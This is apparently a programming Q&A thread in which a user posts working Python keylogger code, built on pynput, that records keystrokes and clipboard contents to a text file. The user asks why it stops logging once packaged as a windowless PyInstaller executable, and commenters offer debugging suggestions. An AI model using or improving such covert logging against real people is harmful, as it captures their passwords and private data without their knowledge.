# Get .exe to interact with .txt

Tags: python, pyinstaller, pynput, keylogger

I was wondering how do I get my program to interact with a text file once it has been turned into an executable file via pyinstaller. The code works when you run it in pycharm and idle, however, when you turn the code into an executable it doesn't record the keys pressed and it doesn't put them into the .txt file. Appreciate any help, thanks.

To turn the .py into an .exe I went to the directory location and ran cmd from there, I typed "pyinstaller -w filename.py" so the entire cmd line looks like this "D:\Documents\Coding Projects\Python\MyProject>pyinstaller -w filename.py"
from there in the directory, it turns it into an executable.

The .txt file is pre-made and put into the same directory as the .exe

Disclaimer: This is a project I'm working on purely for educational purposes to advance my coding skills in case you was wondering.

Code:

```
import pyperclip
from datetime import datetime
from pynput.keyboard import Listener

KeyStroke = 'logger.txt'

def log_key_press(key):
    #  Process the key press, get contents of the clipboard
    key = str(key).replace("'", "")
    line_to_write = None
    now = str(datetime.now())

    if key == 'Ctrl':
        line_to_write = f"{now}: Clipboard - {pyperclip.paste()}"

    else:
        line_to_write = f"{now}: key Press - {key}"

    #  Write output to file
    with open(KeyStroke, 'a') as f:
        f.write(f"{line_to_write}\n")

def start():

    # Figure out how to track key presses
    with Listener(on_press=log_key_press) as l:
        l.join()



if __name__ == '__main__':
    start()


exi = input("Do you want to exit?")
if exi in ["y", "Y"]:
    exit
```

Comment: Can you edit your question to include information around how you've "*turn[ed] [your script] into an executable*"? What tool did you use, or which process did you follow?

Comment: Yes sure I will do it now

Comment: Note: `if exi == "y" or "Y":` doesn't do what you want. Use: `if exi in ["y", "Y"]:`

Comment: You said "`it doesn't record the keys pressed into the .txt file`". But you didn't explain what _does_ happen. Is the text file created but blank? Is it missing? Did you see if it's in the same directory as the .exe instead of somewhere else that you expected? Does the file get created if you specify a full path instead of a relative path? Your question doesn't really explain any debugging details.

Comment: Hi there I create the text file myself and then add the text file to the same directory as the .exe

Comment: Try calling just calling `start` without checking `__name__`

Comment: I tried that and I got the same result